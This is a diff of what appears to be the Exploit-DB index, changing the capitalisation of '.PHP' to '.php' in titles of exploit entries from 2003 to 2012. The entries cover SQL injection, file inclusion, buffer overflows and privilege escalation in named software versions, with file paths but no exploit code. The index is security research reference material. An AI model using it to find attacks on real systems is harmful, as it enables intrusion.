22639,platforms/asp/webapps/22639.txt,"IISProtect 2.1/2.2 Web Administration Interface SQL Injection Vulnerability",2003-05-23,Gyrniff,asp,webapps,0 22640,platforms/linux/local/22640.c,"UML_NET Integer Mismanagement Code Execution Vulnerability",2003-05-23,ktha@hushmail.com,linux,local,0 22641,platforms/php/webapps/22641.txt,"BLNews 2.1.3 - Remote File Include Vulnerability",2003-05-24,Over_G,php,webapps,0 -22642,platforms/php/webapps/22642.txt,"Ultimate PHP Board 1.9 admin_iplog.PHP Arbitrary PHP Execution Vulnerability",2003-05-24,euronymous,php,webapps,0 +22642,platforms/php/webapps/22642.txt,"Ultimate PHP Board 1.9 admin_iplog.php Arbitrary PHP Execution Vulnerability",2003-05-24,euronymous,php,webapps,0 22643,platforms/linux/local/22643.pl,"Ifenslave 0.0.7 Argument Local Buffer Overflow Vulnerability (1)",2003-05-26,jlanthea,linux,local,0 22644,platforms/linux/local/22644.c,"Ifenslave 0.0.7 Argument Local Buffer Overflow Vulnerability (2)",2003-05-26,jsk,linux,local,0 22645,platforms/linux/local/22645.c,"Ifenslave 0.0.7 Argument Local Buffer Overflow Vulnerability (3)",2003-05-26,"Julien L",linux,local,0 @@ -19942,10 +19942,10 @@ id,file,description,date,author,platform,type,port 22699,platforms/unix/remote/22699.c,"Mod_Gzip 1.3.x Debug Mode Vulnerabilities",2003-05-06,xCrZx,unix,remote,0 22700,platforms/linux/dos/22700.c,"MyServer 0.4.3 HTTP GET Argument Buffer Overflow Vulnerability",2003-09-08,badpack3t,linux,dos,0 22701,platforms/linux/dos/22701.c,"MyServer 0.5 HTTP GET Argument Buffer Overflow Vulnerability",2003-09-08,badpack3t,linux,dos,0 -22702,platforms/php/webapps/22702.pl,"Webfroot Shoutbox 2.32 Expanded.PHP Remote Command Execution Vulnerability",2003-06-02,_6mO_HaCk,php,webapps,0 +22702,platforms/php/webapps/22702.pl,"Webfroot Shoutbox 2.32 Expanded.php Remote Command Execution Vulnerability",2003-06-02,_6mO_HaCk,php,webapps,0 22703,platforms/linux/local/22703.c,"XMame 0.6x Lang Local Buffer Overflow Vulnerability",2003-03-31,"Gabriel A. Maggiotti",linux,local,0 22704,platforms/php/webapps/22704.txt,"Webchat 2.0 Module Path Disclosure Weakness",2003-06-02,"Rynho Zeros Web",php,webapps,0 -22705,platforms/php/webapps/22705.txt,"Webfroot Shoutbox 2.32 Expanded.PHP Remote Directory Traversal Vulnerability",2003-06-02,_6mO_HaCk,php,webapps,0 +22705,platforms/php/webapps/22705.txt,"Webfroot Shoutbox 2.32 Expanded.php Remote Directory Traversal Vulnerability",2003-06-02,_6mO_HaCk,php,webapps,0 22706,platforms/windows/dos/22706.asm,"Crob FTP Server 2.50.4 - Remote Username Format String Vulnerability",2003-06-02,"Luca Ercoli",windows,dos,0 22707,platforms/windows/dos/22707.txt,"Novell Groupwise Internet Agent LDAP BIND Request Overflow Vulnerability",2012-11-14,"Francis Provencher",windows,dos,0 22708,platforms/php/webapps/22708.txt,"dotproject <= 2.1.6 - Remote File Inclusion Vulnerability",2012-11-14,dun,php,webapps,0 @@ -19955,8 +19955,8 @@ id,file,description,date,author,platform,type,port 22711,platforms/php/webapps/22711.txt,"Myrephp Business Directory - Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 22712,platforms/php/webapps/22712.txt,"MYREphp Vacation Rental Software - Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 22714,platforms/windows/remote/22714.rb,"Oracle Database Client System Analyzer Arbitrary File Upload",2012-11-15,metasploit,windows,remote,0 -22715,platforms/php/webapps/22715.txt,"WebChat 2.0 Users.PHP Database Username Disclosure Weakness",2003-06-02,"Rynho Zeros Web",php,webapps,0 -22716,platforms/php/webapps/22716.txt,"WebChat 2.0 Users.PHP Cross-Site Scripting Vulnerability",2003-06-02,"Rynho Zeros Web",php,webapps,0 +22715,platforms/php/webapps/22715.txt,"WebChat 2.0 Users.php Database Username Disclosure Weakness",2003-06-02,"Rynho Zeros Web",php,webapps,0 +22716,platforms/php/webapps/22716.txt,"WebChat 2.0 Users.php Cross-Site Scripting Vulnerability",2003-06-02,"Rynho Zeros Web",php,webapps,0 22717,platforms/php/webapps/22717.txt,"SPChat 0.8 Module Remote File Include Vulnerability",2003-06-02,"Rynho Zeros Web",php,webapps,0 22718,platforms/windows/dos/22718.c,"Pi3Web 2.0.2 SortName Buffer Overflow Vulnerability",2003-06-02,posidron,windows,dos,0 22719,platforms/linux/local/22719.pl,"kon2 - Local Buffer Overflow Vulnerability (1)",2003-06-03,wsxz,linux,local,0 @@ -19989,7 +19989,7 @@ id,file,description,date,author,platform,type,port 22747,platforms/asp/webapps/22747.txt,"MaxWebPortal 1.30 - Remote Database Disclosure",2003-06-06,JeiAr,asp,webapps,0 22748,platforms/linux/local/22748.c,"Xaos 3.0 Language Option Local Buffer Overflow Vulnerability",2003-06-06,bazarr@ziplip.com,linux,local,0 22749,platforms/novell/dos/22749.txt,"Novell Netware 6.0_eDirectory 8.7 HTTPSTK.NLM Remote Abend Vulnerability",2003-06-06,"Cheese Head",novell,dos,0 -22750,platforms/php/webapps/22750.txt,"Zentrack 2.2/2.3/2.4 Index.PHP Remote File Include Vulnerability",2003-06-06,farking,php,webapps,0 +22750,platforms/php/webapps/22750.txt,"Zentrack 2.2/2.3/2.4 Index.php Remote File Include Vulnerability",2003-06-06,farking,php,webapps,0 22751,platforms/multiple/remote/22751.txt,"Mozilla 1.x_opera 6/7 Timed Document.Write Method Cross Domain Policy Vulnerability",2003-06-07,meme-boi,multiple,remote,0 22752,platforms/java/webapps/22752.txt,"H-Sphere 2.x HTML Template Inclusion Cross-Site Scripting Vulnerabilities",2003-06-09,"Lorenzo Hernandez Garcia-Hierro",java,webapps,0 22753,platforms/cgi/remote/22753.pl,"MNOGoSearch 3.1.20 - Search.CGI UL Buffer Overflow Vulnerability (1)",2003-06-10,pokleyzz,cgi,remote,0 @@ -20003,7 +20003,7 @@ id,file,description,date,author,platform,type,port 22761,platforms/php/webapps/22761.txt,"PostNuke 0.723 - Multiple Cross-Site Scripting Vulnerabilities",2003-06-13,"David F. Madrid",php,webapps,0 22762,platforms/php/webapps/22762.txt,"Sphera HostingDirector 1.0/2.0/3.0 VDS Control Panel Multiple Cross-Site Scripting Vulnerabilities",2003-06-13,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22829,platforms/php/webapps/22829.txt,"webid <= 1.0.5 - Directory Traversal",2012-11-19,loneferret,php,webapps,80 -22767,platforms/php/webapps/22767.txt,"PostNuke 0.723 User.PHP UNAME Cross-Site Scripting Vulnerability",2003-06-13,"David F. Madrid",php,webapps,0 +22767,platforms/php/webapps/22767.txt,"PostNuke 0.723 User.php UNAME Cross-Site Scripting Vulnerability",2003-06-13,"David F. Madrid",php,webapps,0 22768,platforms/linux/local/22768.pl,"ATFTP 0.7 - Timeout Command Line Argument Local Buffer Overflow Vulnerability",2003-06-06,"Julien LANTHEA",linux,local,0 22769,platforms/windows/remote/22769.txt,"Methodus 3 Web Server File Disclosure Vulnerability",2003-06-13,"Peter Winter-Smith",windows,remote,0 22770,platforms/cgi/webapps/22770.txt,"Infinity CGI Exploit Scanner 3.11 - Cross-Site Scripting Vulnerability",2003-06-12,badpack3t,cgi,webapps,0 @@ -20013,7 +20013,7 @@ id,file,description,date,author,platform,type,port 22773,platforms/linux/local/22773.c,"Progress Database 9.1 - Environment Variable Local Privilege Escalation Vulnerability",2003-06-14,kf,linux,local,0 22774,platforms/windows/dos/22774.txt,"myServer 0.4.1 Signal Handling Denial of Service Vulnerability",2003-06-14,LynX,windows,dos,0 22775,platforms/linux/local/22775.txt,"FreeWnn 1.1.1 JServer Logging Option Data Corruption Vulnerability",2003-06-14,"Stefano Di Paola",linux,local,0 -22776,platforms/php/webapps/22776.txt,"PMachine 2.2.1 Lib.Inc.PHP Remote Include Command Execution Vulnerability",2003-06-15,frog,php,webapps,0 +22776,platforms/php/webapps/22776.txt,"PMachine 2.2.1 Lib.Inc.php Remote Include Command Execution Vulnerability",2003-06-15,frog,php,webapps,0 22777,platforms/cgi/webapps/22777.txt,"LedNews 0.7 Post Script Code Injection Vulnerability",2003-06-16,"gilbert vilvoorde",cgi,webapps,0 22778,platforms/asp/webapps/22778.txt,"Snitz Forums 2000 3.4.03 - Search.ASP Cross-Site Scripting Vulnerability",2003-06-16,JeiAr,asp,webapps,0 22779,platforms/windows/local/22779.pl,"Mailtraq 2.1.0.1302 - User Password Encoding Weakness",2003-06-16,"Noam Rathaus",windows,local,0 @@ -20035,7 +20035,7 @@ id,file,description,date,author,platform,type,port 22795,platforms/windows/remote/22795.txt,"MiniHTTPServer WebForums Server 1.x/2.0 - Remote Directory Traversal Vulnerability",2003-06-18,dr_insane,windows,remote,0 22796,platforms/linux/dos/22796.php,"MidHosting FTP Daemon 1.0.1 Shared Memory Local Denial of Service Vulnerability",2003-06-18,"Frank DENIS",linux,dos,0 22797,platforms/hardware/dos/22797.txt,"Avaya Cajun P130/P133/P330/P333 Network Switch Connection Stalling Denial of Service",2003-06-18,"Jacek Lipkowski",hardware,dos,0 -22798,platforms/php/webapps/22798.txt,"PHPMyAdmin 2.x Information Disclosure Vulnerability",2003-06-18,"Lorenzo Manuel Hernandez Garcia-Hierro",php,webapps,0 +22798,platforms/php/webapps/22798.txt,"phpMyAdmin 2.x - Information Disclosure Vulnerability",2003-06-18,"Lorenzo Manuel Hernandez Garcia-Hierro",php,webapps,0 22799,platforms/cgi/webapps/22799.txt,"Kerio MailServer 5.6.3 Web Mail ADD_ACL Module Cross-Site Scripting Vulnerability",2003-06-18,"David F.Madrid",cgi,webapps,0 22800,platforms/linux/dos/22800.txt,"Kerio Mailserver 5.6.3 subscribe Module Overflow",2003-06-18,"David F.Madrid",linux,dos,0 22801,platforms/linux/dos/22801.txt,"Kerio Mailserver 5.6.3 add_acl Module Overflow",2003-06-18,"David F.Madrid",linux,dos,0 @@ -20055,7 +20055,7 @@ id,file,description,date,author,platform,type,port 22815,platforms/linux/local/22815.c,"GNU GNATS 3.113 Environment Variable Buffer Overflow Vulnerability",2003-06-21,Xpl017Elz,linux,local,0 22816,platforms/windows/dos/22816.txt,"Symantec Security Check RuFSI ActiveX Control Buffer Overflow Vulnerability",2003-06-23,"Cesar Cerrudo",windows,dos,0 22817,platforms/windows/dos/22817.pl,"MyServer 0.4.1 - Remote Denial of Service Vulnerability",2003-06-23,eip,windows,dos,0 -22818,platforms/php/webapps/22818.txt,"Tutos 1.1 File_Select.PHP Cross-Site Scripting Vulnerability",2003-06-20,"François SORIN",php,webapps,0 +22818,platforms/php/webapps/22818.txt,"Tutos 1.1 File_Select.php Cross-Site Scripting Vulnerability",2003-06-20,"François SORIN",php,webapps,0 22819,platforms/php/webapps/22819.txt,"Tutos 1.1 File_New Arbitrary File Upload Vulnerability",2003-06-20,"François SORIN",php,webapps,0 22820,platforms/php/webapps/22820.txt,"XMB Forum 1.8 member.php member Parameter XSS",2003-06-23,"Knight Commander",php,webapps,0 22821,platforms/php/webapps/22821.txt,"XMB Forum 1.8 buddy.php action Parameter XSS",2003-06-23,"Knight Commander",php,webapps,0 @@ -20077,7 +20077,7 @@ id,file,description,date,author,platform,type,port 22838,platforms/windows/remote/22838.txt,"BRS WebWeaver 1.0 Error Page Cross-Site Scripting Vulnerability",2003-06-26,"Carsten H. Eiram",windows,remote,0 22839,platforms/linux/dos/22839.c,"methane IRCd 0.1.1 - Remote Format String Vulnerability",2003-06-27,Dinos,linux,dos,0 22840,platforms/linux/local/22840.c,"Linux Kernel 2.4 - execve() System Call Race Condition PoC Vulnerability",2003-06-26,IhaQueR,linux,local,0 -22841,platforms/php/webapps/22841.txt,"iXmail 0.2/0.3 iXmail_NetAttach.PHP File Deletion Vulnerability",2003-06-26,leseulfrog,php,webapps,0 +22841,platforms/php/webapps/22841.txt,"iXmail 0.2/0.3 iXmail_NetAttach.php File Deletion Vulnerability",2003-06-26,leseulfrog,php,webapps,0 22842,platforms/php/webapps/22842.txt,"CutePHP CuteNews 1.3 HTML Injection Vulnerability",2003-06-29,"Peter Winter-Smith",php,webapps,0 22843,platforms/cgi/webapps/22843.txt,"MegaBook 1.1/2.0/2.1 - Multiple HTML Injection Vulnerabilities",2003-06-29,"Morning Wood",cgi,webapps,0 22844,platforms/windows/dos/22844.html,"Opera 7 - Denial of Service Vulnerabilities",2003-06-30,Operash,windows,dos,0 @@ -20125,8 +20125,8 @@ id,file,description,date,author,platform,type,port 22883,platforms/windows/local/22883.c,"Microsoft Windows 2000 - CreateFile API Named Pipe Privilege Escalation Vulnerability (2)",2003-07-08,Maceo,windows,local,0 22884,platforms/linux/local/22884.c,"Tower Toppler 0.96 HOME Environment Variable Local Buffer Overflow Vulnerability",2003-07-08,FBHowns,linux,local,0 22885,platforms/asp/webapps/22885.asp,"QuadComm Q-Shop 2.5 Failure To Validate Credentials Vulnerability",2003-07-09,G00db0y,asp,webapps,0 -22886,platforms/php/webapps/22886.txt,"ChangshinSoft EZTrans Server Download.PHP Directory Traversal Vulnerability",2003-07-09,"SSR Team",php,webapps,0 -22887,platforms/php/webapps/22887.txt,"PHPForum 2.0 RC1 Mainfile.PHP Remote File Include Vulnerability",2003-07-10,theblacksheep,php,webapps,0 +22886,platforms/php/webapps/22886.txt,"ChangshinSoft EZTrans Server Download.php Directory Traversal Vulnerability",2003-07-09,"SSR Team",php,webapps,0 +22887,platforms/php/webapps/22887.txt,"PHPForum 2.0 RC1 Mainfile.php Remote File Include Vulnerability",2003-07-10,theblacksheep,php,webapps,0 22888,platforms/asp/webapps/22888.pl,"Virtual Programming VP-ASP 5.00 shopexd.asp SQL Injection Vulnerability (1)",2003-07-10,"TioEuy & AresU",asp,webapps,0 22889,platforms/asp/webapps/22889.pl,"Virtual Programming VP-ASP 5.00 shopexd.asp SQL Injection Vulnerability (2)",2003-07-10,"Bosen & TioEuy",asp,webapps,0 22890,platforms/freebsd/remote/22890.pl,"cftp 0.12 Banner Parsing Buffer Overflow Vulnerability",2003-07-10,inv[at]dtors,freebsd,remote,0 @@ -20165,7 +20165,7 @@ id,file,description,date,author,platform,type,port 22952,platforms/linux/dos/22952.txt,"xfstt 1.2/1.4 Unspecified Memory Disclosure Vulnerability",2003-07-23,V9,linux,dos,0 22953,platforms/php/webapps/22953.txt,"PHP-Gastebuch 1.60 Information Disclosure Vulnerabilities",2003-07-24,"Jim Pangalos",php,webapps,0 22955,platforms/php/webapps/22955.html,"PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload And Execution Vulnerability",2003-07-24,"Martin Eiszner",php,webapps,0 -22956,platforms/php/webapps/22956.txt,"e107 Website System 0.555 DB.PHP Information Disclosure Vulnerability",2003-07-24,"Artoor Petrovich",php,webapps,0 +22956,platforms/php/webapps/22956.txt,"e107 Website System 0.555 DB.php Information Disclosure Vulnerability",2003-07-24,"Artoor Petrovich",php,webapps,0 22957,platforms/windows/dos/22957.cpp,"Microsoft SQL Server 7.0/2000_MSDE Named Pipe Denial of Service Vulnerability",2003-07-23,refdom,windows,dos,0 22958,platforms/php/webapps/22958.txt,"e107 Website System 0.554 HTML Injection Vulnerability",2003-07-25,"Pete Foster",php,webapps,0 22959,platforms/windows/remote/22959.txt,"Microsoft Outlook Express 5/6 Script Execution Weakness",2003-07-25,http-equiv,windows,remote,0 @@ -20186,7 +20186,7 @@ id,file,description,date,author,platform,type,port 22922,platforms/php/webapps/22922.txt,"Ultimate Bulletin Board 6.0/6.2 UBBER Cookie HTML Injection Vulnerability",2003-07-16,anti_acid,php,webapps,0 22923,platforms/unix/local/22923.c,"Tolis Group BRU 17.0 - Local Root Exploit (1)",2003-07-16,DVDMAN,unix,local,0 22924,platforms/unix/local/22924.c,"Tolis Group BRU 17.0 - Local Root Exploit (2)",2003-07-16,nic,unix,local,0 -22925,platforms/php/webapps/22925.txt,"eStore 1.0.1/1.0.2 Settings.inc.PHP Path Disclosure Vulnerability",2003-07-17,Bosen,php,webapps,0 +22925,platforms/php/webapps/22925.txt,"eStore 1.0.1/1.0.2 Settings.inc.php Path Disclosure Vulnerability",2003-07-17,Bosen,php,webapps,0 22926,platforms/multiple/dos/22926.txt,"Witango Server 5.0.1.061 - Remote Cookie Buffer Overflow Vulnerability",2003-07-18,"Next Generation Software",multiple,dos,0 22927,platforms/php/webapps/22927.txt,"SimpNews 2.0.1/2.13 PATH_SIMPNEWS Remote File Include Vulnerability",2003-07-18,PUPET,php,webapps,0 22928,platforms/linux/local/22928.pl,"mcrypt <= 2.5.8 - Stack Based Overflow",2012-11-26,Tosh,linux,local,0 @@ -20233,7 +20233,7 @@ id,file,description,date,author,platform,type,port 22987,platforms/multiple/dos/22987.pl,"EveryBuddy 0.4.3 Long Message Denial of Service Vulnerability",2003-08-05,"Noam Rathaus",multiple,dos,0 22988,platforms/unix/local/22988.sh,"IBM DB2 db2job File Overwrite Vulnerability",2003-08-05,"Juan Manuel Pascual Escribá",unix,local,0 22989,platforms/unix/local/22989.pl,"IBM DB2 Shared Library Injection Vulnerability",2003-08-05,daniels@legend.co.uk,unix,local,0 -22990,platforms/php/webapps/22990.txt,"vBulletin 3.0 Register.PHP HTML Injection Vulnerability",2003-08-06,"Ferruh Mavituna",php,webapps,0 +22990,platforms/php/webapps/22990.txt,"vBulletin 3.0 Register.php HTML Injection Vulnerability",2003-08-06,"Ferruh Mavituna",php,webapps,0 22991,platforms/hardware/dos/22991.txt,"D-Link DI-704P Long URL Denial of Service Vulnerability",2003-08-06,chris@cr-secure.net,hardware,dos,0 22992,platforms/asp/webapps/22992.txt,"IdealBB 1.4.9 Error.ASP Cross-Site Scripting Vulnerability",2003-08-07,G00db0y,asp,webapps,0 22993,platforms/linux/local/22993.txt,"IPNetSentryX / IPNetMonitorX Unauthorized Network Reconnaissance Vulnerability",2003-07-07,@stake,linux,local,0 @@ -20244,7 +20244,7 @@ id,file,description,date,author,platform,type,port 22998,platforms/php/webapps/22998.txt,"PostNuke 0.6/0.7 web_links Module TTitle Cross-Site Scripting Vulnerability",2003-08-08,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22999,platforms/windows/dos/22999.pl,"Meteor FTP Server 1.2/1.5 USER Memory Corruption Vulnerability",2003-08-08,zerash,windows,dos,0 23000,platforms/php/webapps/23000.txt,"geeeekShop 1.4 Information Disclosure Vulnerabilities",2003-08-09,G00db0y,php,webapps,0 -23001,platforms/php/webapps/23001.txt,"Invision Power Board 1.0/1.1/1.2 Admin.PHP Cross-Site Scripting Vulnerability",2003-08-09,"Boy Bear",php,webapps,0 +23001,platforms/php/webapps/23001.txt,"Invision Power Board 1.0/1.1/1.2 Admin.php Cross-Site Scripting Vulnerability",2003-08-09,"Boy Bear",php,webapps,0 23002,platforms/windows/remote/23002.txt,"MDaemon SMTP Server 5.0.5 Null Password Authentication Vulnerability",2003-08-09,"Buckaroo Banzai",windows,remote,0 23004,platforms/multiple/webapps/23004.txt,"Oracle OpenSSO 8.0 - Multiple XSS POST Injection Vulnerabilities",2012-11-29,LiquidWorm,multiple,webapps,0 23005,platforms/asp/webapps/23005.txt,"FCKEditor Core ASP 2.6.8 - File Upload Protection Bypass",2012-11-29,"Soroush Dalili",asp,webapps,0 @@ -20258,7 +20258,7 @@ id,file,description,date,author,platform,type,port 23024,platforms/multiple/remote/23024.txt,"SurgeLDAP 1.0 d Path Disclosure Vulnerability",2003-08-13,"Ziv Kamir",multiple,remote,0 23025,platforms/cgi/webapps/23025.txt,"SurgeLDAP 1.0 d User.CGI Cross-Site Scripting Vulnerability",2003-08-13,"Ziv Kamir",cgi,webapps,0 23026,platforms/php/webapps/23026.txt,"Xoops 1.0/1.3.x BBCode HTML Injection Vulnerability",2003-08-13,frog,php,webapps,0 -23027,platforms/php/webapps/23027.txt,"HolaCMS 1.2.x HTMLtags.PHP Local File Include Vulnerability",2003-08-13,"Virginity Security",php,webapps,0 +23027,platforms/php/webapps/23027.txt,"HolaCMS 1.2.x HTMLtags.php Local File Include Vulnerability",2003-08-13,"Virginity Security",php,webapps,0 23028,platforms/php/webapps/23028.txt,"Free Hosting Manager 2.0 (packages.php id param) SQL Injection Vulnerability",2012-11-30,"Yakir Wizman",php,webapps,0 23029,platforms/php/webapps/23029.txt,"SmartCMS (index.php menuitem param) SQL Injection & Cross-Site Scripting Vulnerabilities",2012-11-30,"Yakir Wizman",php,webapps,0 23032,platforms/asp/webapps/23032.txt,"Clickcess ChitChat.NET name XSS",2003-08-13,G00db0y,asp,webapps,0 @@ -20286,8 +20286,8 @@ id,file,description,date,author,platform,type,port 23057,platforms/php/webapps/23057.txt,"newsPHP 216 - Remote File Include Vulnerability",2003-08-25,Officerrr,php,webapps,0 23058,platforms/php/webapps/23058.txt,"newsPHP 216 - Authentication Bypass Vulnerability",2003-08-25,Officerrr,php,webapps,0 23059,platforms/cgi/webapps/23059.txt,"Netbula Anyboard 9.9.5 6 Information Disclosure Vulnerability",2003-08-25,"cyber talon",cgi,webapps,0 -23060,platforms/php/webapps/23060.txt,"Py-Membres 4.x Secure.PHP Unauthorized Access Vulnerability",2003-08-26,frog,php,webapps,0 -23061,platforms/php/webapps/23061.txt,"Py-Membres 4.x Pass_done.PHP Remote SQL Injection Vulnerability",2003-08-26,frog,php,webapps,0 +23060,platforms/php/webapps/23060.txt,"Py-Membres 4.x Secure.php Unauthorized Access Vulnerability",2003-08-26,frog,php,webapps,0 +23061,platforms/php/webapps/23061.txt,"Py-Membres 4.x Pass_done.php Remote SQL Injection Vulnerability",2003-08-26,frog,php,webapps,0 23062,platforms/bsd/local/23062.c,"BSD-Games 2.x Monop Player Name Local Buffer Overrun Vulnerability (1)",2003-08-25,^sq,bsd,local,0 23063,platforms/bsd/local/23063.c,"BSD-Games 2.x Monop Player Name Local Buffer Overrun Vulnerability (2)",2003-08-25,N4rK07IX,bsd,local,0 23064,platforms/php/webapps/23064.txt,"Attila PHP 3.0 - SQL Injection Unauthorized Privileged Access Vulnerability",2003-08-26,frog,php,webapps,0 @@ -20436,7 +20436,7 @@ id,file,description,date,author,platform,type,port 23210,platforms/windows/local/23210.c,"Microsoft Windows XP/2000 PostThreadMessage() Arbitrary Process Killing Vulnerability",2003-10-02,"Brett Moore",windows,local,0 23211,platforms/windows/remote/23211.cpp,"EarthStation 5 - Search Service Remote File Deletion Vulnerabililty",2003-10-03,"random nut",windows,remote,0 23212,platforms/hardware/remote/23212.txt,"Cisco LEAP Password Disclosure Weakness",2003-10-03,"Cisco Security",hardware,remote,0 -23213,platforms/php/webapps/23213.txt,"WordPress 0.6/0.7 Blog.Header.PHP - SQL Injection Vulnerabilities",2003-10-03,"Seth Woolley",php,webapps,0 +23213,platforms/php/webapps/23213.txt,"WordPress 0.6/0.7 Blog.Header.php - SQL Injection Vulnerabilities",2003-10-03,"Seth Woolley",php,webapps,0 23214,platforms/cgi/webapps/23214.txt,"Sun Cobalt RaQ 1.1/2.0/3.0/4.0 Message.CGI Cross-Site Scripting Vulnerability",2003-10-03,"Lorenzo Hernandez Garcia-Hierro",cgi,webapps,0 23215,platforms/windows/dos/23215.html,"Microsoft Internet Explorer 6 Absolute Position Block Denial of Service Vulnerability",2003-10-03,"Nick Johnson",windows,dos,0 23216,platforms/windows/dos/23216.txt,"Microsoft Word 97/98/2002 Malformed Document Denial of Service Vulnerability",2003-10-03,"Bahaa Naamneh",windows,dos,0 @@ -20555,7 +20555,7 @@ id,file,description,date,author,platform,type,port 23330,platforms/php/webapps/23330.txt,"Synthetic Reality SymPoll 1.5 - Cross-Site Scripting Vulnerability",2003-11-03,"Michael Frame",php,webapps,0 23331,platforms/asp/webapps/23331.txt,"Web Wiz Forum 6.34/7.0/7.5 - Unauthorized Private Forum Access Vulnerability",2003-11-03,"Alexander Antipov",asp,webapps,0 23332,platforms/cgi/webapps/23332.txt,"MPM Guestbook 1.2 - Cross-Site Scripting Vulnerability",2003-11-03,"David Ferreira",cgi,webapps,0 -23333,platforms/php/webapps/23333.txt,"PHPKit 1.6 Include.PHP Cross-Site Scripting Vulnerability",2003-11-02,ben.moeckel@badwebmasters.net,php,webapps,0 +23333,platforms/php/webapps/23333.txt,"PHPKit 1.6 Include.php Cross-Site Scripting Vulnerability",2003-11-02,ben.moeckel@badwebmasters.net,php,webapps,0 23334,platforms/windows/remote/23334.pl,"IA WebMail Server 3.0/3.1 Long GET Request Buffer Overrun Vulnerability",2003-11-03,"Peter Winter-Smith",windows,remote,0 23335,platforms/asp/webapps/23335.txt,"VieNuke VieBoard 2.6 - SQL Injection Vulnerability",2003-11-03,ekerazha@yahoo.it,asp,webapps,0 23336,platforms/php/webapps/23336.txt,"OpenAutoClassifieds 1.0 Listing Parameter Cross-Site Scripting Vulnerability",2003-11-04,"David Sopas Ferreira",php,webapps,0 @@ -20587,7 +20587,7 @@ id,file,description,date,author,platform,type,port 23360,platforms/linux/remote/23360.rb,"PostgreSQL for Linux Payload Execution",2012-12-13,metasploit,linux,remote,0 23361,platforms/hardware/dos/23361.txt,"Cisco Wireless Lan Controller 7.2.110.0 - Multiple Vulnerabilities",2012-12-13,"Jacob Holcomb",hardware,dos,0 23362,platforms/php/webapps/23362.py,"Centreon Enterprise Server 2.3.3-2.3.9-4 - Blind SQL Injection Exploit",2012-12-13,modpr0be,php,webapps,0 -23363,platforms/php/webapps/23363.txt,"phpBB 2.0.x Profile.PHP SQL Injection Vulnerability",2003-11-08,JOCANOR,php,webapps,0 +23363,platforms/php/webapps/23363.txt,"phpBB 2.0.x Profile.php SQL Injection Vulnerability",2003-11-08,JOCANOR,php,webapps,0 23364,platforms/linux/local/23364.sh,"WMAPM 3.1 - Privilege Escalation Vulnerability",2003-11-08,"Knud Erik Hojgaard",linux,local,0 23365,platforms/windows/remote/23365.txt,"telcondex simplewebserver 2.13.31027 build 3289 - Directory Traversal Vulnerability",2003-11-10,nimber@designer.ru,windows,remote,0 23366,platforms/linux/remote/23366.c,"Epic 1.0.1/1.0.x CTCP Nickname Server Message Buffer Overrun Vulnerability",2003-11-10,Li0n7,linux,remote,0 @@ -20635,7 +20635,7 @@ id,file,description,date,author,platform,type,port 23417,platforms/windows/remote/23417.c,"EZMeeting 3.x EZNet.EXE Long HTTP Request Remote Buffer Overflow Vulnerability",2003-12-08,kralor,windows,remote,0 23418,platforms/cgi/webapps/23418.pl,"Webgate WebEye Information Disclosure Vulnerability",2003-12-08,datapath,cgi,webapps,0 23419,platforms/windows/remote/23419.txt,"Abyss Web Server 1.0/1.1 - Authentication Bypass Vulnerability",2003-12-08,"Luigi Auriemma",windows,remote,0 -23420,platforms/php/webapps/23420.txt,"Bitfolge Snif 1.2.6 Index.PHP Path Cross-Site Scripting Vulnerability",2003-12-09,"Justin Hagstrom",php,webapps,0 +23420,platforms/php/webapps/23420.txt,"Bitfolge Snif 1.2.6 Index.php Path Cross-Site Scripting Vulnerability",2003-12-09,"Justin Hagstrom",php,webapps,0 23421,platforms/cgi/webapps/23421.txt,"calacode @mail webmail system 3.52 - Multiple Vulnerabilities",2003-12-09,"Nick Gudov",cgi,webapps,0 23422,platforms/windows/remote/23422.txt,"Microsoft Internet Explorer 5/6_ Mozilla 1.2.1 - URI Display Obfuscation Weakness (1)",2003-12-09,"Guy Crumpley",windows,remote,0 23423,platforms/windows/remote/23423.txt,"Microsoft Internet Explorer 5/6_ Mozilla 1.2.1 - URI Display Obfuscation Weakness (2)",2003-12-09,"Zap The Dingbat",windows,remote,0 @@ -20647,7 +20647,7 @@ id,file,description,date,author,platform,type,port 23427,platforms/linux/dos/23427.txt,"Totem Movie Player 3.4.3 (Ubuntu) - Stack Corruption",2012-12-16,coolkaveh,linux,dos,0 23428,platforms/php/webapps/23428.html,"Mambo 4.5 Server user.php Script Unauthorized Access Vulnerability",2003-12-10,frog,php,webapps,0 23429,platforms/php/webapps/23429.txt,"Mambo Open Source 4.0.14 Server SQL Injection Vulnerability",2003-12-10,"Chintan Trivedi",php,webapps,0 -23430,platforms/php/webapps/23430.txt,"Mambo Open Source 4.0.14 PollBooth.PHP Multiple SQL Injection Vulnerabilities",2003-12-10,frog,php,webapps,0 +23430,platforms/php/webapps/23430.txt,"Mambo Open Source 4.0.14 PollBooth.php Multiple SQL Injection Vulnerabilities",2003-12-10,frog,php,webapps,0 23431,platforms/multiple/dos/23431.pl,"SX Design sipd 0.1.2 - Remote Denial of Service Vulnerability",2003-12-11,storm,multiple,dos,0 23432,platforms/cgi/webapps/23432.txt,"RemotelyAnywhere Default.HTML Logout Message Injection Weakness",2003-12-11,"Oliver Karow",cgi,webapps,0 23433,platforms/multiple/remote/23433.txt,"Mozilla Browser 1.5 URI MouseOver Obfuscation Weakness",2003-12-11,netmask,multiple,remote,0 @@ -20686,9 +20686,9 @@ id,file,description,date,author,platform,type,port 23629,platforms/cgi/webapps/23629.txt,"Leif M. Wright Web Blog 1.1 - Remote Command Execution Vulnerability",2004-01-31,ActualMInd,cgi,webapps,0 23472,platforms/windows/remote/23472.rb,"Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow",2012-12-18,metasploit,windows,remote,0 23631,platforms/php/webapps/23631.txt,"PHP-Nuke 6.x - Multiple Module SQL Injection Vulnerabilities",2004-02-02,"Security Corporation",php,webapps,0 -23473,platforms/php/webapps/23473.txt,"My Little Forum 1.3 Email.PHP Cross-Site Scripting Vulnerability",2003-12-23,"David S. Ferreira",php,webapps,0 -23474,platforms/php/webapps/23474.txt,"Webfroot Shoutbox 2.32 Viewshoutbox.PHP Cross-Site Scripting Vulnerability",2003-12-23,"Ben Drysdale",php,webapps,0 -23475,platforms/php/webapps/23475.txt,"phpBB 2.0.6 - Privmsg.PHP Cross-Site Scripting Vulnerability",2003-12-23,"Ben Drysdale",php,webapps,0 